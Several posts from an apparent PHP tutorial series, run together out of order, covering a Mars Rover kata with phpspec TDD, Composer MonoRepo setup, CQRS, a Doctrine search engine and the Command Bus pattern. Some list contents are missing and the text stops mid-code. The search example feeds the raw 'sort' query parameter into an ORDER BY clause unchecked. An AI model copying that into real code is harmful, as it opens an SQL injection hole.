- Command, a class which validates the use case input, and whose name
  communicates imperative intention (e.g. LandRover)
- CommandHandler, which does the actual logic for the use case
- CommandBus, which takes a Command and executes the appropriate
  CommandHandler, and allows for middlewares

We're going to twist this design pattern for the Mars Rover by omitting the
CommandBus class, as we don't really need middlewares or to find the
appropriate CommandHandler for a given Command.
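For reference, here's a hypothetical sketch of the CommandBus class we're leaving out (without middleware support); none of this code goes into the package, it just shows what the omitted piece would do:

```php
<?php

// Hypothetical sketch of the CommandBus class we're omitting:
// it maps each Command class to its CommandHandler and executes it.
// Middleware support is what a real bus would add on top of this.
class CommandBus
{
    private $handlers = [];

    public function register(string $commandClass, $handler)
    {
        $this->handlers[$commandClass] = $handler;
    }

    public function execute($command)
    {
        $commandClass = get_class($command);
        if (false === isset($this->handlers[$commandClass])) {
            throw new \InvalidArgumentException(
                'No handler registered for '.$commandClass
            );
        }

        $this->handlers[$commandClass]->handle($command);
    }
}
```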
Let's start by creating the Command class that'll take care of the input
parameter validation:
cd packages/navigation
git checkout -b 2-landing
We're going to bootstrap the test class for LandRover, using
phpspec:
vendor/bin/phpspec describe 'MarsRover\Navigation\LandRover'
This should generate this spec/MarsRover/Navigation/LandRoverSpec.php class:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\LandRover;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class LandRoverSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(LandRover::class);
}
}
This leaves us the task of editing it to start describing input parameters:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = 'north';
function it_has_x_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getX()->shouldBe(self::X);
}
function it_has_y_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getY()->shouldBe(self::Y);
}
function it_has_an_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getOrientation()->shouldBe(self::ORIENTATION);
}
}
We can now run the tests:
vendor/bin/phpspec run
This will generate the src/MarsRover/Navigation/LandRover.php file:
<?php
namespace MarsRover\Navigation;
class LandRover
{
private $argument1;
private $argument2;
private $argument3;
public function __construct($argument1, $argument2, $argument3)
{
$this->argument1 = $argument1;
$this->argument2 = $argument2;
$this->argument3 = $argument3;
}
public function getX()
{
}
public function getY()
{
}
public function getOrientation()
{
}
}
All we need to do is to edit it:
<?php
namespace MarsRover\Navigation;
class LandRover
{
private $x;
private $y;
private $orientation;
public function __construct($x, $y, $orientation)
{
$this->x = $x;
$this->y = $y;
$this->orientation = $orientation;
}
public function getX() : int
{
return $this->x;
}
public function getY() : int
{
return $this->y;
}
public function getOrientation() : string
{
return $this->orientation;
}
}
Let's run the tests again:
vendor/bin/phpspec run
All green! But our job isn't finished yet; we haven't described invalid input parameters:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = 'north';
function it_has_x_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getX()->shouldBe(self::X);
}
function it_cannot_have_non_integer_x_coordinate()
{
$this->beConstructedWith(
'Nobody expects the Spanish Inquisition!',
self::Y,
self::ORIENTATION
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
function it_has_y_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getY()->shouldBe(self::Y);
}
function it_cannot_have_non_integer_y_coordinate()
{
$this->beConstructedWith(
self::X,
'No one expects the Spanish Inquisition!',
self::ORIENTATION
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
function it_has_an_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getOrientation()->shouldBe(self::ORIENTATION);
}
function it_cannot_have_a_non_cardinal_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
'A herring!'
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
Running the tests again:
vendor/bin/phpspec run
They fail, because we need to check input parameters:
<?php
namespace MarsRover\Navigation;
class LandRover
{
const VALID_ORIENTATIONS = ['north', 'east', 'west', 'south'];
private $x;
private $y;
private $orientation;
public function __construct($x, $y, $orientation)
{
if (false === is_int($x)) {
throw new \InvalidArgumentException(
'X coordinate must be an integer'
);
}
$this->x = $x;
if (false === is_int($y)) {
throw new \InvalidArgumentException(
'Y coordinate must be an integer'
);
}
$this->y = $y;
if (false === in_array($orientation, self::VALID_ORIENTATIONS, true)) {
throw new \InvalidArgumentException(
'Orientation must be one of: '
.implode(', ', self::VALID_ORIENTATIONS)
);
}
$this->orientation = $orientation;
}
public function getX() : int
{
return $this->x;
}
public function getY() : int
{
return $this->y;
}
public function getOrientation() : string
{
return $this->orientation;
}
}
Let's run the tests again:
vendor/bin/phpspec run
All green! We can now commit our work:
git add -A
git commit -m '2: Created LandRover'
We've followed the first steps of TDD: write a test then write the code.
Using phpspec makes this process easier as the code gets bootstrapped for us once we've written the test.
Since we write those tests first, in a descriptive way (test method names are sentences), we can use them as runnable self-checking specifications! phpspec allows us to display them explicitly:
vendor/bin/phpspec run --format=pretty
This should display:
MarsRover\Navigation\LandRover
13 ✔ has x coordinate
24 ✔ cannot have non integer x coordinate
37 ✔ has y coordinate
48 ✔ cannot have non integer y coordinate
61 ✔ has an orientation
72 ✔ cannot have a non cardinal orientation
1 specs
6 examples (6 passed)
10ms
Note: the navigation tests can also be run from the MonoRepo:
cd ../../
composer update --optimize-autoloader
vendor/bin/phpspec run
In the next article we'll complete the TDD cycle by refactoring LandRover:
we'll extract x and y coordinates into their own class.
But first, we need to initialize our project.
Let's start by creating a new git repository:
mkdir rover
cd rover
git init
Since we're going to use Composer, we can create
a composer.json file:
{
"name": "mars-rover/mars-rover",
"license": "MIT",
"type": "project",
"description": "Mars Rover",
"require": {
"php": "^7.0"
}
}
We're then going to ignore some third party library related stuff by
creating .gitignore:
# Third Party libraries
/vendor/
With this we've finished creating our repository. We can run composer:
composer install --optimize-autoloader
That should be enough for a first commit:
git add composer.json .gitignore
git commit -m '0: Created project'
Creating the navigation package

By having a look at the use cases, we can see that there are going to be "write-only" dedicated ones and "read-only" dedicated ones.
Since we'd like to follow the CQRS principle, we'll put the "write-only"
logic in a different package than the "read-only" logic. Landing and Driving
is all about navigation, so we'll create a navigation package:
git checkout -b 1-navigation
mkdir -p packages/navigation
cd packages/navigation
Composer needs us to set up the package by creating a composer.json file:
{
"name": "mars-rover/navigation",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Navigation",
"autoload": {
"psr-4": { "MarsRover\\Navigation\\": "src/MarsRover/Navigation" }
},
"require": {
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
We've decided to use phpspec as a test framework, and to get the most out of it we'd like to use its SpecGen extension. To do so we need to create the phpspec.yml.dist file:
extensions:
    Memio\SpecGen\MemioSpecGenExtension: ~
Note: For more information about phpspec see this article.
Finally, we can configure this package's git by creating a .gitignore file:
# Configuration
/phpspec.yml
# Third Party libraries
/vendor/
/composer.lock
With this we've finished creating our package. We can run Composer:
composer install --optimize-autoloader
That should be enough for a second commit:
git add -A
git commit -m '1: Created Navigation package'
Adding navigation to the project

Let's go back to the project's root:
cd ../../
One benefit of MonoRepos is being able to run all packages' tests in one command. To do so, we need to require navigation in our project's composer.json file:
{
"name": "mars-rover/mars-rover",
"license": "MIT",
"type": "project",
"description": "Mars Rover",
"repositories": [
{
"type": "path",
"url": "./packages/*"
}
],
"require": {
"mars-rover/navigation": "*@dev",
"php": "^7.0"
}
}
By default, Composer looks for packages only in Packagist.
By adding the new repositories section we can tell it to also check locally
in ./packages, allowing us to add them in the require section.
Composer needs us to tell it what version of the package we'd like, but in
MonoRepos all packages share the same version, so we simply use * (any).
But to be able to use the latest changes, and not only the tagged one, we
have to specify the development stability (@dev).
Since we've decided to use phpspec for our tests, we're also going to require it in the project's development dependencies:
composer require --dev phpspec/phpspec:^3.0
By default phpspec is going to look for tests in the project's root. We need to create a phpspec.yml.dist file to tell it to use the navigation package's ones:
suites:
    navigation:
        namespace: 'MarsRover\Navigation'
        src_path: packages/navigation/src
        spec_path: packages/navigation
We'll also update .gitignore to ignore local configuration:
# Configuration
/phpspec.yml
# Third Party libraries
/vendor/
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
./vendor/bin/phpspec run
That should be enough for a last commit:
git add -A
git commit -m '1: Added navigation package to main project'
Let's merge it to master:
git checkout master
git merge --no-ff 1-navigation
With Composer we can create many packages inside a single repository. With this MonoRepo, we can then execute all the tests in one command.
In the next article we'll tackle the "Landing a Rover on Mars" use case, allowing us to showcase an example of Event Sourcing and TDD.
In this introductory article, we're simply going to describe our Mars Rover specifications.
Note: This programming exercise originally comes from Dallas Hack Club, which is now unfortunately down.
This Mars Rover kata has been adapted for the needs of this series.
But first, let's have a quick reminder on what the practices mentioned above are.
A MonoRepo is a single versioning repository containing many packages that would otherwise be versioned in their own repositories.
With it, everything can be found in one place, which makes it easy to:
However it also brings the following disadvantages:
MonoRepos make sense for projects that would be packaged / released together (although it makes it possible to package / release them independently).
Note: Here are some references about MonoRepos:
CQRS is about separating "write" logic from "read" logic, and it can be applied on many levels, for example:
It's important to note that CQRS can also be applied partially in the same project: use it only when it makes sense.
Note: Here are some references about CQRS:
With ES, every significant action is recorded as an "event". Keeping track of those events provides the following advantages:
Just like with CQRS, it's important to note that ES can also be applied partially inside a project: use it only when it makes sense.
ES is often associated with CQRS, but they can be used separately.
Note: Here are some references about ES:
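The core idea can be sketched in a few framework-free lines (the class names below are invented for illustration): state is never stored directly, it's rebuilt by replaying the recorded events.

```php
<?php

// A recorded fact: something significant that happened.
final class ProfileWasCreated
{
    public $name;

    public function __construct(string $name)
    {
        $this->name = $name;
    }
}

// An append-only log of events.
final class EventStore
{
    private $events = [];

    public function append($event)
    {
        $this->events[] = $event;
    }

    public function all() : array
    {
        return $this->events;
    }
}

$store = new EventStore();
$store->append(new ProfileWasCreated('Arthur Dent'));
$store->append(new ProfileWasCreated('Ford Prefect'));

// Replaying the events rebuilds the current state.
$names = array_map(function ($event) {
    return $event->name;
}, $store->all());

// $names is now ['Arthur Dent', 'Ford Prefect']
```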
TDD can be summed up in the following steps when developing:
Writing the test before the code forces us to think about how we'd like the future code to be used. It's like writing specifications, but with 3 purposes: design, documentation and automated regression checking.
This discipline makes it easy to have a high code coverage (although rigour still needs to be applied: we need to test all the happy paths and all the unhappy ones).
Note: Here are some references about TDD:
The purpose of this series is to create the software of a Mars Rover, according to the following specifications.
Mars Rovers need first to be landed at a given position. A position is composed
of coordinates (x and y, which are both integers) and an orientation
(a string being one of north, east, west or south).
It is then possible to drive them, using instructions such as move_forward
(keeps orientation, but moves along the x or y axis) or
turn_left / turn_right (keeps the same coordinates, but changes the
orientation).
From time to time, they'll be requested to give their current location
(again, x and y coordinates and the orientation).
For example, a rover can be landed at 23, 42, north and then can be
instructed to move forward twice, then to turn left, then to move forward once.
When requested to, it should provide this location: 22, 44, west.
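This walk-through can be sanity-checked with a small throwaway script (the array-based simulator below is just an illustration, not part of the kata's code):

```php
<?php

// Toy simulation of the example: land at 23, 42, north, then
// move forward twice, turn left, and move forward once.
$x = 23;
$y = 42;
$orientation = 'north';

// Turning left from each cardinal point, and the x/y delta of a forward move.
$leftOf = ['north' => 'west', 'west' => 'south', 'south' => 'east', 'east' => 'north'];
$forward = ['north' => [0, 1], 'south' => [0, -1], 'east' => [1, 0], 'west' => [-1, 0]];

foreach (['move_forward', 'move_forward', 'turn_left', 'move_forward'] as $instruction) {
    if ('turn_left' === $instruction) {
        $orientation = $leftOf[$orientation];
    } else {
        $x += $forward[$orientation][0];
        $y += $forward[$orientation][1];
    }
}

echo "$x, $y, $orientation\n"; // 22, 44, west
```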
From the above specifications, we can identify at least three use cases:
In the next article we'll initialize the project by creating the MonoRepo and
its first package: navigation.
Note: We'll be using:
- PHP 7
- Composer
- git
- phpspec and its SpecGen extension
TL;DR: A Search Engine component can help you get the CQRS "Query" part right.
The Command / Query Responsibility Segregation (CQRS) principle states that "write" and "read" logic should be separated. For example a single "Publisher" server (write) with many "Subscribers" servers (read) is a macro example of applying this principle, and an API that defines a read endpoint free from write side effects is a micro example of applying it.
Because it's hard to go from a regular mindset to a CQRS one, we've seen in the last article how we can use the Command Bus pattern to help us get the Command part right.
The "Query" equivalent of the Command Bus would be the Repository design pattern.
Note: Here's some nice articles about this pattern:
However, a repository can grow into an object containing many methods like findByName, findAllInDescendingOrder, findByNameInDescendingOrder, etc.
To avoid this, we can combine it with the Specification design pattern:
our Repository would only have one single search method taking a Criteria object
that describes our query parameters.
Note: For more articles on the topic, see:
In this article, we'll build a private "Search Engine" component to help us get the Query part right.
All projects are different, and while the feature described here might bear some similarity to other projects' requirements, there's a big chance that creating a single common library would prove too hard.
So instead we'll create a "private" Component for our project: it's going to be decoupled, allowing it to become a library on its own in the unlikely event it turns out to be the "Universal Search Engine Component".
Our requirements will be the following: we need to create an endpoint that allows us to search "profiles", with the following features:

- pagination (default page = 1, default number of profiles per page = 10)
- ordering (default field = name, default direction = ASC)
- filtering (e.g. by name)

Here's a HTTP Request example:
GET /v1/profiles?name=marvin&page=42&per_page=23&sort=-name HTTP/1.1
Accept: application/json
Note: sort's value can be either name (the default) or -name (changes the direction to be descending).
And here's a HTTP Response example:
HTTP/1.1 200 OK
Content-Type: application/json
{
"items": [
{
"name": "Arthur Dent"
},
{
"name": "Ford Prefect"
},
{
"name": "Trillian Astra"
}
],
"page": {
"current_page": 1,
"per_page": 10,
"total_elements": 3,
"total_pages": 1
}
}
In order to satisfy the above requirements, we need to create a flexible Search Engine component that can accept any of those parameters. That can be done in one interface and a few (4) value objects.
First, we can have a SearchEngine interface:
<?php
namespace AppBundle\Search;
use Porpaginas\Result;
interface SearchEngine
{
public function match(Criteria $criteria) : Result;
}
Note: We're using porpaginas, a library that makes paginated result a breeze to handle. Find out more about it here.
A Criteria is a value object, composed of:

- the resource name (e.g. profile)
- a Paginating value object
- an Ordering value object
- a Filtering value object

It can be constructed using the query parameters:
<?php
namespace AppBundle\Search;
use AppBundle\Search\Criteria\Filtering;
use AppBundle\Search\Criteria\Ordering;
use AppBundle\Search\Criteria\Paginating;
class Criteria
{
public $resourceName;
public $filtering;
public $ordering;
public $paginating;
public function __construct(
string $resourceName,
Filtering $filtering,
Ordering $ordering,
Paginating $paginating
) {
$this->resourceName = $resourceName;
$this->filtering = $filtering;
$this->ordering = $ordering;
$this->paginating = $paginating;
}
public static function fromQueryParameters(string $resourceName, array $queryParameters) : self
{
return new self(
$resourceName,
Filtering::fromQueryParameters($queryParameters),
Ordering::fromQueryParameters($queryParameters),
Paginating::fromQueryParameters($queryParameters)
);
}
}
The Paginating value object takes care of the page parameter (e.g. 1) and
the per_page parameter (e.g. 10):
<?php
namespace AppBundle\Search\Criteria;
class Paginating
{
const DEFAULT_CURRENT_PAGE = 1;
const DEFAULT_ITEMS_PER_PAGE = 10;
public $currentPage;
public $itemsPerPage;
public $offset;
public function __construct(int $currentPage, int $itemsPerPage)
{
$this->currentPage = $currentPage;
if ($this->currentPage <= 0) {
$this->currentPage = self::DEFAULT_CURRENT_PAGE;
}
$this->itemsPerPage = $itemsPerPage;
if ($this->itemsPerPage <= 0) {
$this->itemsPerPage = self::DEFAULT_ITEMS_PER_PAGE;
}
$this->offset = $this->currentPage * $this->itemsPerPage - $this->itemsPerPage;
}
public static function fromQueryParameters(array $queryParameters) : self
{
$currentPage = $queryParameters['page'] ?? self::DEFAULT_CURRENT_PAGE;
$maximumResults = $queryParameters['per_page'] ?? self::DEFAULT_ITEMS_PER_PAGE;
return new self($currentPage, $maximumResults);
}
}
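For example, with the page=42&per_page=23 values from the earlier HTTP request, the constructor's offset formula works out like this (standalone arithmetic mirroring the class above):

```php
<?php

// Same formula as in Paginating's constructor:
// skip all the items belonging to the previous pages.
$currentPage = 42;
$itemsPerPage = 23;

$offset = $currentPage * $itemsPerPage - $itemsPerPage; // i.e. (42 - 1) * 23

echo $offset, "\n"; // 943
```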
The Ordering value object takes care of the sort parameter (e.g. -name):
<?php
namespace AppBundle\Search\Criteria;
class Ordering
{
const DEFAULT_FIELD = 'name';
const DEFAULT_DIRECTION = 'ASC';
public $field;
public $direction;
public function __construct(string $field, string $direction)
{
$this->field = $field;
$this->direction = $direction;
}
public static function fromQueryParameters(array $queryParameters) : self
{
$column = $queryParameters['sort'] ?? self::DEFAULT_FIELD;
$direction = self::DEFAULT_DIRECTION;
if ('-' === $column[0]) {
$direction = 'DESC';
$column = trim($column, '-');
}
return new self($column, $direction);
}
}
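A quick standalone check of that parsing logic, using the -name value from the HTTP request example (the parseSort helper is just for illustration; the real logic lives in fromQueryParameters):

```php
<?php

// Mirrors Ordering::fromQueryParameters(): a leading '-' flips the
// direction to descending and is stripped from the field name.
function parseSort(string $sort) : array
{
    $direction = 'ASC';
    if ('-' === $sort[0]) {
        $direction = 'DESC';
        $sort = trim($sort, '-');
    }

    return [$sort, $direction];
}

$default = parseSort('name');   // ['name', 'ASC']
$reversed = parseSort('-name'); // ['name', 'DESC']
```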
The Filtering value object takes care of all the other parameters:
<?php
namespace AppBundle\Search\Criteria;
class Filtering
{
public $fields;
public function __construct(array $fields)
{
$this->fields = $fields;
}
public static function fromQueryParameters(array $queryParameters) : self
{
$fields = $queryParameters;
unset($fields['page']);
unset($fields['per_page']);
unset($fields['sort']);
return new self($fields);
}
}
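With the query string from the request example above, everything that isn't a pagination or sorting parameter ends up as a filter (standalone sketch of the same unset logic):

```php
<?php

// Mirrors Filtering::fromQueryParameters(): reserved parameters are
// removed, and whatever remains is treated as a filter.
$queryParameters = ['name' => 'marvin', 'page' => '42', 'per_page' => '23', 'sort' => '-name'];

$fields = $queryParameters;
unset($fields['page'], $fields['per_page'], $fields['sort']);

// $fields is now ['name' => 'marvin']
```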
With this we have a generic Search Engine. The next step is to provide an implementation.
All implementations of SearchEngine need to be able to handle many types of
parameters (pagination, filtering, etc).
To keep our Doctrine implementation from becoming a big ball of mud,
we're going to split the work into Builders, which construct the query using
the QueryBuilder:
<?php
namespace AppBundle\DoctrineSearch;
use AppBundle\Search\Criteria;
use AppBundle\Search\SearchEngine;
use Doctrine\DBAL\Connection;
use Doctrine\DBAL\Query\QueryBuilder;
use Porpaginas\Result;
class DoctrineSearchEngine implements SearchEngine
{
private $connection;
private $builders = [];
public function __construct(Connection $connection)
{
$this->connection = $connection;
}
public function add(Builder $builder)
{
$this->builders[] = $builder;
}
public function match(Criteria $criteria) : Result
{
$queryBuilder = new QueryBuilder($this->connection);
foreach ($this->builders as $builder) {
if (true === $builder->supports($criteria)) {
$builder->build($criteria, $queryBuilder);
}
}
return new DoctrineResult($queryBuilder);
}
}
Here's the Builder interface:
<?php
namespace AppBundle\DoctrineSearch;
use AppBundle\Search\Criteria;
use Doctrine\DBAL\Query\QueryBuilder;
interface Builder
{
public function supports(Criteria $criteria) : bool;
public function build(Criteria $criteria, QueryBuilder $queryBuilder);
}
We're not going to execute the query immediately, we're instead going to return
the QueryBuilder wrapped in a Result implementation: this will allow us to
choose between getting all the profiles or only getting a subset:
<?php
namespace AppBundle\DoctrineSearch;
use Doctrine\DBAL\Query\QueryBuilder;
use Porpaginas\Result;
class DoctrineResult implements Result
{
private $queryBuilder;
public function __construct(QueryBuilder $queryBuilder)
{
$this->queryBuilder = $queryBuilder;
}
public function take($offset, $limit)
{
$queryBuilder = clone $this->queryBuilder;
$queryBuilder->setFirstResult($offset);
$queryBuilder->setMaxResults($limit);
$statement = $queryBuilder->execute();
return new IteratorPage($statement->getIterator(), $offset, $limit, $this->count());
}
public function count()
{
$queryBuilder = clone $this->queryBuilder;
$subSql = $queryBuilder->getSql();
$sql = <<<SQL
SELECT count(*) AS count
FROM (
$subSql
) as sub_query
SQL
;
$result = $queryBuilder->getConnection()->fetchAssoc($sql, $queryBuilder->getParameters());
return $result['count'] ?? 0;
}
public function getIterator()
{
$queryBuilder = clone $this->queryBuilder;
$statement = $queryBuilder->execute();
return $statement->getIterator();
}
}
Finally if a subset is asked, we need to provide our implementation of Page:
<?php
namespace AppBundle\DoctrineSearch;
use Porpaginas\Page;
class IteratorPage implements Page
{
private $iterator;
private $offset;
private $limit;
private $totalCount;
public function __construct(\Iterator $iterator, int $offset, int $limit, int $totalCount)
{
$this->iterator = $iterator;
$this->offset = $offset;
$this->limit = $limit;
$this->totalCount = $totalCount;
}
public function getCurrentOffset()
{
return $this->offset;
}
public function getCurrentPage()
{
if (0 === $this->limit) {
return 1;
}
return (int) floor($this->offset / $this->limit) + 1;
}
public function getCurrentLimit()
{
return $this->limit;
}
public function count()
{
return count($this->iterator);
}
public function totalCount()
{
return $this->totalCount;
}
public function getIterator()
{
return $this->iterator;
}
}
Now that we have a fully functional Search Engine, we need to create Builders specific to our needs. The first one will be about selecting profiles:
<?php
namespace AppBundle\Profile\DoctrineSearch;
use AppBundle\DoctrineSearch\Builder;
use AppBundle\Search\Criteria;
use Doctrine\DBAL\Query\QueryBuilder;
class SelectProfileBuilder implements Builder
{
public function supports(Criteria $criteria) : bool
{
return 'profile' === $criteria->resourceName;
}
public function build(Criteria $criteria, QueryBuilder $queryBuilder)
{
$queryBuilder->select('name');
$queryBuilder->from('profile', 'p');
}
}
We also need to be able to order our results:
<?php
namespace AppBundle\Profile\DoctrineSearch;
use AppBundle\DoctrineSearch\Builder;
use AppBundle\Search\Criteria;
use Doctrine\DBAL\Query\QueryBuilder;
class OrderingBuilder implements Builder
{
public function supports(Criteria $criteria) : bool
{
return true;
}
public function build(Criteria $criteria, QueryBuilder $queryBuilder)
{
$queryBuilder->orderBy(
$criteria->ordering->field,
$criteria->ordering->direction
);
}
}
Finally if a name filter is provided we want to apply it:
<?php
namespace AppBundle\Profile\DoctrineSearch;
use AppBundle\DoctrineSearch\Builder;
use AppBundle\Search\Criteria;
use Doctrine\DBAL\Query\QueryBuilder;
class ProfileNameFilteringBuilder implements Builder
{
public function supports(Criteria $criteria) : bool
{
return 'profile' === $criteria->resourceName && isset($criteria->filtering->fields['name']);
}
public function build(Criteria $criteria, QueryBuilder $queryBuilder)
{
$queryBuilder->where('p.name LIKE :name');
$queryBuilder->setParameter('name', "%{$criteria->filtering->fields['name']}%");
}
}
Let's create our controller:
<?php
// File: src/AppBundle/Controller/SearchProfilesController.php
namespace AppBundle\Controller;
use AppBundle\Search\Criteria;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class SearchProfilesController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"GET"})
*/
public function searchProfilesAction(Request $request)
{
$criteria = Criteria::fromQueryParameters(
'profile',
$request->query->all()
);
$page = $this->get('app.search_engine')->match($criteria)->take(
$criteria->paginating->offset,
$criteria->paginating->itemsPerPage
);
$totalElements = $page->totalCount();
$totalPages = (int) ceil($totalElements / $criteria->paginating->itemsPerPage);
return new JsonResponse(array(
'items' => iterator_to_array($page->getIterator()),
'page' => array(
'current_page' => $criteria->paginating->currentPage,
'per_page' => $criteria->paginating->itemsPerPage,
'total_elements' => $totalElements,
'total_pages' => $totalPages,
),
), 200);
}
}
And that's it!
Just like using and overusing the "Command Bus" pattern can help us learn more on how to get the "Command" part of CQRS right, using and overusing the "Repository" design pattern in combination with the "Specification" one can help us get the "Query" part right.
Building a private Search Engine component for our project is one way to achieve this.
TL;DR: The Command Bus pattern can help you get the CQRS "Command" part right.
By following the Command / Query Responsibility Segregation (CQRS) principle, we separate "write" logic from "read" logic. This can be applied on many levels, for example on the macro one we can have a single "Publisher" server (write) with many "Subscribers" servers (read), and on a micro level we can use this principle to keep our controllers small.
However, transitioning from a regular mindset to a CQRS one can be difficult.
In this article, we'll explore the "Command Bus" pattern to help us get the Command (write) part right.
Let's take the following code for our example:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use AppBundle\Entity\Profile;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$em = $this->get('doctrine.orm.entity_manager');
$name = $request->request->get('name');
if (null === $name) {
return new JsonResponse(array('error' => 'The "name" parameter is missing from the request\'s body'), 422);
}
if (null !== $em->getRepository('AppBundle:Profile')->findOneByName($name)) {
return new JsonResponse(array('error' => 'The name "'.$name.'" is already taken'), 422);
}
$createdProfile = new Profile($name);
$em->persist($createdProfile);
$em->flush();
return new JsonResponse($createdProfile->toArray(), 201);
}
}
It's an endpoint allowing us to create new "profiles". All the logic is done in the Controller:

- get the name parameter from the Request
- validate it
- create a Profile out of it and save it
- return it as a JSON Response

The Command Bus pattern relies on 3 types of classes:

- Command: encapsulates our input, does simple validation on it
- CommandHandler: dedicated to a single Command, does the actual logic

Finally there's a CommandBus interface allowing us to build Middlewares:

- a CommandBus that calls the appropriate CommandHandler for the given Command
- a CommandBus that wraps the above one in a database transaction
- a CommandBus that wraps the above ones to log all incoming commands
- a CommandBus that wraps the above ones to check permissions

Middlewares can do any action we want before and/or after the wrapped CommandBus.
They can be nested in a specific order, allowing us fine-grained control over how the Command will be handled.
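The nesting idea can be sketched with plain PHP (the interface and class names here are illustrative, not taken from a specific Command Bus library):

```php
<?php

interface CommandBus
{
    public function handle($command);
}

// Innermost bus: in a real application it would locate and call
// the CommandHandler matching the given Command.
final class HandlingCommandBus implements CommandBus
{
    public function handle($command)
    {
        return 'handled '.get_class($command);
    }
}

// A middleware: runs its own logic, then delegates to the bus it wraps.
final class LoggingCommandBus implements CommandBus
{
    private $wrappedBus;
    public $logs = [];

    public function __construct(CommandBus $wrappedBus)
    {
        $this->wrappedBus = $wrappedBus;
    }

    public function handle($command)
    {
        $this->logs[] = 'received '.get_class($command);

        return $this->wrappedBus->handle($command);
    }
}

final class CreateNewProfile
{
}

// Middlewares nest in a specific order around the innermost bus.
$bus = new LoggingCommandBus(new HandlingCommandBus());
$result = $bus->handle(new CreateNewProfile()); // 'handled CreateNewProfile'
```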
Using our previous example, we're going to create the Command first. It needs to contain all the input parameters, do a simple validation on them, and have an intention-revealing name describing the action we'd like to do:
<?php
// File: src/AppBundle/Profile/CreateNewProfile.php;
namespace AppBundle\Profile;
class CreateNewProfile
{
public $name;
public function __construct($name)
{
if (null === $name) {
throw new \DomainException('Missing required "name" parameter');
}
$this->name = (string) $name;
}
}
Unit tests can be created for Commands, to document their input requirements:
<?php
// File: tests/AppBundle/Profile/CreateNewProfileTest.php;
namespace tests\AppBundle\Profile;
use AppBundle\Profile\CreateNewProfile;
class CreateNewProfileTest extends \PHPUnit_Framework_TestCase
{
const NAME = 'Arthur Dent';
/**
* @test
*/
public function it_has_a_name()
{
$createNewProfile = new CreateNewProfile(self::NAME);
self::assertSame(self::NAME, $createNewProfile->name);
}
/**
* @test
*/
public function it_cannot_miss_a_name()
{
$this->expectException(\DomainException::class);
$createNewProfile = new CreateNewProfile(null);
}
}
The second step is to create the CommandHandler. It needs to do more complex validation, and the actual logic associated with the Command's intention:
<?php
// File: src/AppBundle/Profile/CreateNewProfileHandler.php;
namespace AppBundle\Profile;
use AppBundle\Entity\Profile;
use Doctrine\ORM\EntityManager;
class CreateNewProfileHandler
{
private $entityManager;
public function __construct(EntityManager $entityManager)
{
$this->entityManager = $entityManager;
}
public function handle(CreateNewProfile $createNewProfile)
{
$name = $createNewProfile->name;
if (null !== $this->entityManager->getRepository('AppBundle:Profile')->findOneByName($name)) {
throw new \DomainException("Invalid \"name\" parameter: \"$name\" already exists and duplicates are not allowed");
}
$createdProfile = new Profile($name);
$this->entityManager->persist($createdProfile);
$this->entityManager->flush();
return $createdProfile;
}
}
Note: a unit test can be created for CommandHandlers, to document use cases and their edge cases (happy and unhappy scenario).
Finally we can use the Command Bus in our controller:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use AppBundle\Profile\CreateNewProfile;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
try {
$createdProfile = $this->get('command_bus')->handle(new CreateNewProfile(
$request->request->get('name')
));
} catch (\DomainException $e) {
return new JsonResponse(array('error' => $e->getMessage()), 422);
}
return new JsonResponse($createdProfile->toArray(), 201);
}
}
Note: Exceptions could be handled in an event listener.
Our Command Handler is tightly coupled to Doctrine. We can decouple it from libraries by introducing interfaces:
<?php
// File: src/AppBundle/Profile/CreateNewProfileHandler.php;
namespace AppBundle\Profile;
use AppBundle\Profile\Service\CheckProfileNameDuplicates;
use AppBundle\Profile\Service\SaveNewProfile;
class CreateNewProfileHandler
{
private $checkProfileNameDuplicates;
private $saveNewProfile;
public function __construct(
CheckProfileNameDuplicates $checkProfileNameDuplicates,
